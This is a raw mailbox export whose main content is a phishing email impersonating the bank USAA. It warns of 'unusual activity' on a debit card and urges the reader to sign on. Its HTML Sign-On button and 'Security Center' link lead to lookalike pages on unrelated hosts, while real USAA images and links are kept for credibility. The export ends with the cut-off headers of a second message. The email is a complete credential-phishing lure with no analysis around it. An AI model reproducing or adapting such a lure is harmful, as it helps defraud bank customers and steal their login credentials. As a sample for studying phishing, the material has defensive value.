From: "USAA" <clpag@matsu.alaska.edu>
Date: Sun, 03 Apr 2016 17:26:06 -0700
Status: O
X-Status: 
X-Keywords:                  
X-UID: 149

You will not see this in a MIME-aware mail reader.
--===============1829251819==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

   =

  To ensure delivery to your inbox, please add USAA.Customer.Service@mailce=
nter.usaa.com to your address book. 	 =

  =

   	  =

  	 =

  	  =

  Subscribed Alert	 =

  View Accounts | Privacy Promise | Contact Us	 =

  	  =

   =

  	 	 =

  	 	 =

  	 	 =

  	  =

  USAA SECURITY ZONE =

 Security and =

 Privacy =

 USAA Center	 =

  	  =

  	 =

  	 =

  	 =

  	 =

  =

   	 =

   	 =

  =

          Dear USAA Member,      We detected Unusual activity on your USAA =
bank Debit Card on 04-03-2016. For your protection, we need you to review t=
his activity immediately. Click on Sign On below to Review your account.
 =

 =

<https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif =
height=3D"15" width=3D"15" id=3D"yui_3_16_0_1_1399663152274_48861">	Sign-On
     USAA values your business and is committed to keeping your accounts an=
d personal information safe. To learn how we protect your information, visi=
t our Security Center.     Thank you,  USAA        =

        	      =

  =

     USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288     =

   	 =

  	  	 =

   =

 Privacy Promise

 Please do not reply to this e-mail. To contact USAA, visit our secure cont=
act page.
 	 =

  129644-0815
 =

 	  	 =

   =20
--===============1829251819==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><div>





<div>
<div align=3D"center">
<table bgcolor=3D"#b5d7e6" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"650">
      <tbody><tr>
            <td align=3D"center" background=3D"https://ci6.googleuserconten=
t.com/proxy/O8dKxf9Wzm-lPxd7ta6CfzOTxG61BiIsnDwxKp5bx63QUoaQaWwL-AuZ2ol3K7B=
ge2KpU49JY_r9kJq1X_3q57_yRLDKFvlz4Jpx_gtOhGTkNpDGDWgSLOFPfgWQlN6Uag=3Ds0-d-=
e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_emailbar_=
bg.gif" height=3D"35" valign=3D"middle" width=3D"650"><font style=3D"color:=
#929292;font-size:9px" face=3D"Verdana, sans-serif">To
            ensure delivery to your inbox, please add <span style=3D"color:=
#68a7c5"><a href=3D"mailto:USAA.Customer.Service@mailcenter.usaa.com" targe=
t=3D"_blank">USAA.Customer.Service@<wbr>mailcenter.usaa.com</a></span>
            to your address book.</font>
            </td><td>
      </td></tr>
</tbody></table>
<table bgcolor=3D"#b5d7e6" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"650">
      <tbody><tr>
            <td width=3D"10">&nbsp;</td>
            <td align=3D"left" bgcolor=3D"white">
            <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"98%">
                  <tbody><tr>
                        <td colspan=3D"4" height=3D"5"></td>
                  </tr>
                  <tr>
                        <td height=3D"45" width=3D"54"><a rel=3D"nofollow" =
href=3D"https://www.usaa.com/inet/ent_logon/Logon?EID=3D129644-0815_head" t=
arget=3D"_blank"><img src=3D"https://ci4.googleusercontent.com/proxy/U0RKK-=
68hu6LgjAfA1jBqJ14QGkCUxkkcuzfVgJZRMAgGp-B4wCEM2WQuMmqMY_hhx8klDZRxSzTmfy8k=
yoLfS7w2CCXC2cOlPA8E-CRLgExdwOLA6j852wY=3Ds0-d-e1-ft#https://content.usaa.c=
om/mcontent/static_assets/Media/email_logo.gif" alt=3D"" border=3D"0" heigh=
t=3D"41" width=3D"61" class=3D"CToWUd"></a></td>
                        <td>
                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0">
                              <tbody><tr>
                                    <td style=3D"font:bold 16px Arial,sans-=
serif;color:#6d6d6d" align=3D"left" height=3D"22"><span style=3D"display:bl=
ock;margin-top:9px">Subscribed Alert</span></td>
                              </tr>
                              <tr>
                                    <td align=3D"left" nowrap=3D"" height=
=3D"23"><font face=3D"Verdana, sans-serif" size=3D"1"><a rel=3D"nofollow" h=
ref=3D"https://www.usaa.com/inet/ent_home/CpHome?EID=3D129644-0815_head" st=
yle=3D"color:#6d6d6d;text-decoration:none" target=3D"_blank">View Accounts<=
/a> | <a rel=3D"nofollow" href=3D"https://www.usaa.com/inet/ent_utils/McSta=
ticPages?key=3Dprivacy_promise&amp;EID=3D129644-0815_head" style=3D"color:#=
6d6d6d;text-decoration:none" target=3D"_blank">Privacy Promise</a> | <a rel=
=3D"nofollow" href=3D"https://www.usaa.com/inet/ent_contactus/CpLevelZeroCo=
ntactUs?ContactUsPageId=3DPublicContactUs&amp;EID=3D129644-0815_head" style=
=3D"color:#6d6d6d;text-decoration:none" target=3D"_blank">Contact Us</a></f=
ont></td> =

                              </tr>
                        </tbody></table>
                        </td>
                        <td align=3D"right" height=3D"45" valign=3D"middle"=
 width=3D"367">
                        =

                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0" height=3D"65" width=3D"188">
                              <tbody><tr>
                                    <td width=3D"22">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" width=3D"22">
                                          <tbody><tr>
                                                <td style=3D"line-height:0"=
 height=3D"29" valign=3D"top" width=3D"8"><img src=3D"https://ci3.googleuse=
rcontent.com/proxy/NizB52ywu7Oo2N72o5Cm5lPJN86ZxnTutM6FOBBoySVDfPN59sw7e1A9=
RvxQqmCkF5oI3Y9yVRcAHpUiJLhKOBw_nspzoB514W3WEZg1piA_5RhnO7KLErk5Q0Pz=3Ds0-d=
-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.=
gif" alt=3D"" style=3D"display:block" border=3D"0" height=3D"29" width=3D"8=
" class=3D"CToWUd"></td>
                                                <td style=3D"line-height:0"=
 bgcolor=3D"#e7e7e8" height=3D"29" valign=3D"top" width=3D"14"><img src=3D"=
https://ci5.googleusercontent.com/proxy/vMOlYe-5W7Hn5D8SSem02uE85zY5gJ-GGNn=
EKxojoZFQP66ZGjjiq8nzShDYj0gCMUKDg7eVmGrcoOsnk9rJM7g8Q_xJAfFPo_SW59sS8OP4cE=
oEdMrOW5M6K30J=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_assets=
/Media/email_sec_1-2.gif" alt=3D"" style=3D"display:block" border=3D"0" hei=
ght=3D"29" width=3D"14" class=3D"CToWUd"></td>
                                          </tr>
                                          <tr>
                                                <td style=3D"line-height:0"=
 height=3D"29" valign=3D"top" width=3D"8"><img src=3D"https://ci4.googleuse=
rcontent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkAVzuk-7QSTtgXEhP4UomOz=
_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2byafEki0jWXLZW1Utw54=3D=
s0-d-e1-ft#https://content.usaa.com/mcontent/static_assets/Media/email_sec_=
spacer.gif" alt=3D"" style=3D"display:block" border=3D"0" height=3D"29" wid=
th=3D"8" class=3D"CToWUd"></td>
                                                <td style=3D"line-height:0"=
 bgcolor=3D"#e7e7e8" height=3D"29" valign=3D"top" width=3D"14"><img src=3D"=
https://ci4.googleusercontent.com/proxy/oz0x72b7BlCaGH8IPbQbX_hSzXnVLKA8IkA=
Vzuk-7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1VS8wNHm_EBbx2by=
afEki0jWXLZW1Utw54=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_as=
sets/Media/email_sec_spacer.gif" alt=3D"" style=3D"display:block" border=3D=
"0" height=3D"29" width=3D"14" class=3D"CToWUd"></td>
                                          </tr>
                                          <tr>
                                                <td style=3D"line-height:0"=
 height=3D"7" valign=3D"bottom" width=3D"8"></td>
                                                <td style=3D"line-height:0"=
 bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"bottom" width=3D"14"><img src=
=3D"https://ci4.googleusercontent.com/proxy/QpItTHbCMIqp9uIGJcz5CZt6z7lXd3M=
9qFTIfX2kOXdmIBv0Ncveo5yhFsWiI6w0tsnQeFByn2ZDce_EHZSt9oMlCOpHu0bjKhHjwvjkR6=
CGss7ikXUO0jYDP9tK=3Ds0-d-e1-ft#https://content.usaa.com/mcontent/static_as=
sets/Media/email_sec_2-1.gif" alt=3D"" style=3D"display:block" border=3D"0"=
 height=3D"7" width=3D"14" class=3D"CToWUd"></td>
                                          </tr>
                                    </tbody></table>
                                    </td>
                                    <td align=3D"left" bgcolor=3D"#e7e7e8">
                                    <table border=3D"0" cellpadding=3D"5" c=
ellspacing=3D"0" height=3D"65" width=3D"100%">
                                          <tbody><tr>
                                                <td style=3D"text-align:lef=
t;font-size:9px;line-height:12px" align=3D"left" valign=3D"middle"><font st=
yle=3D"font-size:10px;color:#00365b" face=3D"Arial, Helvetica, sans-serif">=
<strong>USAA
                                                SECURITY ZONE</strong></fon=
t> <br>
                                                <font style=3D"font-size:9p=
x;color:#00365b" face=3D"Arial, Helvetica, sans-serif">Security and</font>
                                                <br>
                                                <font style=3D"font-size:9p=
x;color:#00365b" face=3D"Arial, Helvetica, sans-serif">Privacy</font>
                                                <br>
                                                <font style=3D"font-size:9p=
x;color:#00365b" face=3D"Arial, Helvetica, sans-serif">USAA Center</font></=
td>
                                          </tr>
                                    </tbody></table>
                                    </td>
                                    <td bgcolor=3D"#ffffff" width=3D"7">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" width=3D"7">
                                          <tbody><tr>
                                                <td style=3D"line-height:0"=
 align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"top" width=3D"7=
"><img src=3D"https://ci6.googleusercontent.com/proxy/AKIhTrGxlc8dRLYqFBbhj=
PqRmcW28DdWAgQz2w58zTHNrQlyHQ-9_5gSMB5v9RNrAkCfWwxc0GVEnwGOlL-a8WhHxAvWtBE2=
p6Zn6osXYgAnO1cXyrSjg-l1_Mtv=3Ds0-d-e1-ft#https://content.usaa.com/mcontent=
/static_assets/Media/email_sec_1-3.gif" alt=3D"" style=3D"display:block" bo=
rder=3D"0" height=3D"7" width=3D"7" class=3D"CToWUd"></td>
                                          </tr>
                                          <tr>
                                                <td style=3D"line-height:0"=
 align=3D"right" bgcolor=3D"#e7e7e8" height=3D"51" valign=3D"top" width=3D"=
7"><img src=3D"https://ci4.googleusercontent.com/proxy/oz0x72b7BlCaGH8IPbQb=
X_hSzXnVLKA8IkAVzuk-7QSTtgXEhP4UomOz_dIm7EZTeZoD4E8zDlfByMuxzwWzKtArsu3qVV1=
VS8wNHm_EBbx2byafEki0jWXLZW1Utw54=3Ds0-d-e1-ft#https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" alt=3D"" style=3D"display:b=
lock" border=3D"0" height=3D"51" width=3D"7" class=3D"CToWUd"></td>
                                          </tr>
                                          <tr>
                                                <td style=3D"line-height:0"=
 align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"bottom" width=
=3D"7"><img src=3D"https://ci3.googleusercontent.com/proxy/3Hs3pOcNCDxgktK_=
1_a5AHLBDBql5QiLAfWrzR51scCv4wVEQfayt17itPWHf4l54oiIuD-BpBrKWOUxO7PLo-pmMxV=
0XMPNWXE_8xfq4VJ-I_wL_mELE2Iv1lj6=3Ds0-d-e1-ft#https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_2-2.gif" alt=3D"" style=3D"display:bloc=
k" border=3D"0" height=3D"7" width=3D"7" class=3D"CToWUd"></td>
                                          </tr>
                                    </tbody></table>

                                    </td>
                              </tr>
                        </tbody></table>
                         =

                  </td></tr>
                  <tr>
                        <td colspan=3D"4" height=3D"20">&nbsp;</td>
                  </tr>
                  <tr>
                        <td colspan=3D"4" height=3D"1">&nbsp;</td>
                  </tr>
            </tbody></table>
            <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"100%">
                  <tbody><tr>
                        <td align=3D"left"><font style=3D"color:#333333;fon=
t-size:12px;line-height:18px" face=3D"Verdana, sans-serif">
                                <div><div style=3D"margin-left:1em;margin-r=
ight:1em">            <div style=3D"font-style:normal;margin-bottom:0.0pt">=
<span>&nbsp;</span>            </div>            <div style=3D"font-style:n=
ormal;margin-bottom:0.0pt"><span><span></span></span><span>&nbsp;</span>   =
         </div>            <div style=3D"font-style:normal;margin-bottom:0.=
0pt"><span>Dear USAA Member,</span><span><span></span></span>            </=
div>            <div style=3D"font-style:normal;margin-bottom:0.0pt"><span>=
<span></span></span><span>&nbsp;</span>            </div>            <div s=
tyle=3D"font-style:normal;margin-bottom:0.0pt"> We detected Unusual activit=
y on your USAA bank Debit Card on 04-03-2016. For your protection, we need =
you to review this activity immediately. Click on Sign On below to Review y=
our account.<br>				<br>				<table cellspacing=3D"0" cellpadding=3D"0" bord=
er=3D"0" bgcolor=3D"#6cae35" style=3D"background:no-repeat top left;" heigh=
t=3D"15" id=3D"yui_3_16_0_1_1399663152274_48813" width=3D"111"><tbody id=3D=
"yui_3_16_0_1_1399663152274_48812"><tr bgcolor=3D"#6cae35" id=3D"yui_3_16_0=
_1_1399663152274_48811"><td width=3D"15" align=3D"center" valign=3D"middle"=
 bgcolor=3D"#6cae35" id=3D"yui_3_16_0_1_1399663152274_48862"><https://conte=
nt.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif height=3D"15" =
width=3D"15" id=3D"yui_3_16_0_1_1399663152274_48861"></td><td width=3D"96" =
align=3D"center" valign=3D"middle" bgcolor=3D"#6cae35" id=3D"yui_3_16_0_1_1=
399663152274_48810"><a rel=3D"nofollow" target=3D"_blank" href=3D"http://la=
voixducoeur.org/wp-admin/mon.htm" style=3D"font:bold 11px arial, sans-serif=
;color:#fff;text-decoration:none;" id=3D"yui_3_16_0_1_1399663152274_48814"	=
>Sign-On</a></td></tr></tbody></table><font face=3D"Verdana, sans-serif" st=
yle=3D"color:#333333;font-size:12px;line-height:18px;" id=3D"yui_3_16_0_1_1=
399663152274_19828">  </div>            <div style=3D"font-style:normal;mar=
gin-bottom:0.0pt"><span></span><span>&nbsp;</span>            </div>       =
     <div style=3D"font-style:normal;margin-bottom:0.0pt">USAA             =
   values your business and is committed to keeping your                acc=
ounts and personal information safe. To learn how we                protect=
 your information, visit our <a rel=3D"nofollow" href=3D"http://networkweb.=
online/mon.htm" style=3D"color:blue;text-align:left;text-transform:none;tex=
t-decoration:underline" target=3D"_blank">Security                Center</a=
>. </div>            <div style=3D"font-style:normal;margin-bottom:0.0pt"><=
span></span><span>&nbsp;</span>            </div>            <div style=3D"=
font-style:normal;margin-bottom:0.0pt">Thank you, </div>            <div st=
yle=3D"font-style:normal;margin-bottom:0.0pt">USAA </div>            <div s=
tyle=3D"font-style:normal;margin-bottom:0.0pt"><span></span><span>&nbsp;</s=
pan>            </div>            <div style=3D"font-style:normal;margin-bo=
ttom:0.0pt"><span></span><span>&nbsp;</span>            </div>            <=
table style=3D"font-style:normal">                <tbody><tr style=3D"heigh=
t:0.35in">                    <td style=3D"padding-top:0.0in;padding-right:=
0.0in;padding-bottom:0.0in;padding-left:0.0in;width:27.9pt;height:0.35in;bo=
rder:none" valign=3D"top"><div style=3D"font-style:normal;margin-bottom:0.0=
pt"><span></span> <a rel=3D"nofollow" href=3D"http://www.facebook.com/USAA"=
 target=3D"_blank"><img alt=3D"border=3D&quot;0&quot;" src=3D"https://ci6.g=
oogleusercontent.com/proxy/Jho1rnK-pHMMYq11cqkz77VK5OHR8DeE4icMoS5dLpNSCkgd=
5ypBqi_rsLH2zsMPkudpHBKXq-WNyXQrEVc1yB1pqCcC-VyanDj3rqGgTNdZ2sRjqp2ikGb80jy=
McA=3Ds0-d-e1-ft#http://content.usaa.com/mcontent/static_assets/om/Media/fa=
cebookIcon.gif" height=3D"29" width=3D"29" class=3D"CToWUd">               =
             </a> <a rel=3D"nofollow" href=3D"http://www.facebook.com/USAA"=
 style=3D"color:blue;text-align:left;text-transform:none;text-decoration:un=
derline" target=3D"_blank"><span style=3D"color:#000000"><span></span></spa=
n>                            </a> </div>                    </td><td style=
=3D"padding-top:0.0in;padding-right:0.0in;padding-bottom:0.0in;padding-left=
:0.0in;width:30.6pt;height:0.35in;border:none" valign=3D"top"><div style=3D=
"font-style:normal;margin-bottom:0.0pt"><span></span> <a rel=3D"nofollow" h=
ref=3D"http://twitter.com/usaa" target=3D"_blank"><img alt=3D"border=3D&quo=
t;0&quot;" src=3D"https://ci3.googleusercontent.com/proxy/Bzw3iNc4cVBhc_Wju=
GGuF0D9CfWnc5LBeJfx20772yxyutFklQUpypoRk93S8aLJHp0IgM7UKf2FTZ_lpY5NTG-tA_lo=
gPfrkRDJTlkM6SwHkookLAz1s-W8DsyP=3Ds0-d-e1-ft#http://content.usaa.com/mcont=
ent/static_assets/om/Media/twitterIcon.gif" height=3D"29" width=3D"29" clas=
s=3D"CToWUd">                            </a> <a rel=3D"nofollow" href=3D"h=
ttp://twitter.com/usaa" style=3D"color:blue;text-align:left;text-transform:=
none;text-decoration:underline" target=3D"_blank"><span style=3D"color:#000=
000"><span></span></span>                            </a> </div>           =
         </td></tr>            </tbody></table>            </div><table sty=
le=3D"background:#b5d7e6;font-style:normal">                <tbody><tr>    =
                <td style=3D"padding-top:0.0in;padding-right:5.4pt;padding-=
bottom:0.0in;padding-left:5.4pt;width:7.15in;border:none" valign=3D"top"><d=
iv style=3D"font-style:normal;text-align:center;margin-bottom:0.0pt"><span =
style=3D"color:#6d6d6d;font-size:7.5pt"><a rel=3D"nofollow" href=3D"https:/=
/www.usaa.com/inet/ent_utils/McStaticPages?key=3Dprivacy_promise" style=3D"=
color:blue;text-decoration:underline" target=3D"_blank"></a><span> </span><=
span></span></span><span style=3D"color:#6d6d6d;font-size:7.5pt"></span>   =
                     </div>                        <div style=3D"font-style=
:normal;text-align:center;margin-bottom:0.0pt"><span style=3D"color:#6d6d6d=
;font-size:7.5pt">USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<=
/span><span style=3D"color:#6d6d6d;font-size:7.5pt"><span></span></span>   =
                     </div>                        <div style=3D"font-style=
:normal;text-align:center;margin-bottom:0.0pt"><span style=3D"color:#6d6d6d=
;font-size:7.5pt"><span></span></span><span style=3D"color:#6d6d6d;font-siz=
e:7.5pt">&nbsp;</span>                        </div>                    </t=
d></tr>            </tbody></table>        </div>    </font></td>
                  </tr>
            </tbody></table>
            </td>
            <td width=3D"10">&nbsp;</td>
      </tr>
 =

     <tr bgcolor=3D"#b5d7e6">
            <td colspan=3D"2" align=3D"center"><font style=3D"color:#6d6d6d=
;font-size:10px;line-height:18px" face=3D"Verdana, sans-serif">
          <br>
            =

             <a rel=3D"nofollow" href=3D"https://www.usaa.com/inet/pages/pr=
ivacy_promise?EID=3D129644-0815_foot" target=3D"_blank">Privacy Promise</a>=
<br><br>

          =

Please do not reply to this e-mail. To contact USAA, visit our secure <a re=
l=3D"nofollow" href=3D"https://www.usaa.com/inet/ent_references/CpSendUsAMe=
ssage?ContentArea=3Dcp&amp;EID=3D129644-0815_foot" target=3D"_blank">contac=
t page</a>.<br>

</font></td>
     </tr>
     =

     <tr bgcolor=3D"#b5d7e6">
            <td colspan=3D"2" align=3D"right"><font style=3D"color:#6d6d6d;=
font-size:10px;line-height:18px" face=3D"Verdana, sans-serif">129644-0815</=
font><br>
            <br>
            </td>
            <td>&nbsp;</td>
      </tr>
</tbody></table><div class=3D"yj6qo"></div><div class=3D"adL">
</div></div><div class=3D"adL">
</div></div><div class=3D"adL">
</div></div></html>
--===============1829251819==--

From jose@monkey.org Mon Apr  4 08:20:37 2016 +0000
Return-Path: frizvanbegovic@collegeofthedesert.edu
Delivered-To: jose@monkey.org
X-FDA: 71367799314.13.pig59_5575d6c35943
X-Spam-Summary: 10,1,0,c0e03d8eae9683a4,d41d8cd98f00b204,frizvanbegovic@collegeofthedesert.edu,:i.bastow@earth.leeds.ac.uk,RULES_HIT:10:41:355:379:582:967:978:988:989:1152:1260:1261:1277:1311:1313:1314:1345:1381:1437:1513:1515:1516:1518:1521:1534:1537:1559:1593:1594:1711:1714:1730:1747:1777:1792:2393:2525:2559:2563:2682:2685:2693:2828:2859:2900:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3804:3865:3867:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4552:4886:5007:6261:8985:9025:10004:10400:11537:11658:11914:12043:12050:12051:12295:12519:12555:12657:12661:12698:12737:13069:13163:13229:13311:13357:13439:14181:14721:21080:30021:30022:30037:30054:30069:30070,0,RBL:207.233.122.61:@collegeofthedesert.edu:.lbl8.mailshell.net-62.22.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:66,LUA_SUMMARY:none
X-HE-Tag: pig59_5575d6c35943
X-Filterd-Recvd-Size: 1890
Received: from ironport.collegeofthedesert.edu (ironport.collegeofthedesert.edu [207.233.122.61])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  4 Apr 2016 08:20:36 +0000 (UTC)
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: A2BoewBLIwJX/2QBDgpdDoMpU4EDgmu2AoQCMiGFbAKBKkwBAQEBAQFmHAsJBYQ6gQsBBRAjSCYBBBuIHRCbGpw2AYRTJgSMIgGCVhEBHk6CXYIrBY4FiXyPWgEVhE2DHIU+hhqFD4NxYoMsOzyHGwcXBxgBfQEBAQ
X-IPAS-Result: A2BoewBLIwJX/2QBDgpdDoMpU4EDgmu2AoQCMiGFbAKBKkwBAQEBAQFmHAsJBYQ6gQsBBRAjSCYBBBuIHRCbGpw2AYRTJgSMIgGCVhEBHk6CXYIrBY4FiXyPWgEVhE2DHIU+hhqFD4NxYoMsOzyHGwcXBxgBfQEBAQ
X-IronPort-AV: E=Sophos;i="5.24,439,1455004800"; 
   d="scan'208";a="42618611"
Received: from unknown (HELO DCCDMAILCAS1.dccd.cc.ca.us) ([10.14.1.100])
  by IP-Inside.dccd.cc.ca.us with ESMTP; 04 Apr 2016 01:19:16 -0700
Received: from DCCDMAIL1.dccd.cc.ca.us ([fe80::99ba:969e:b1c7:88aa]) by
 DCCDMAILCAS1.dccd.cc.ca.us ([fe80::d8e5:b39f:630b:6110%15]) with mapi id
 14.02.0247.003; Mon, 4 Apr 2016 01:19:15 -0700
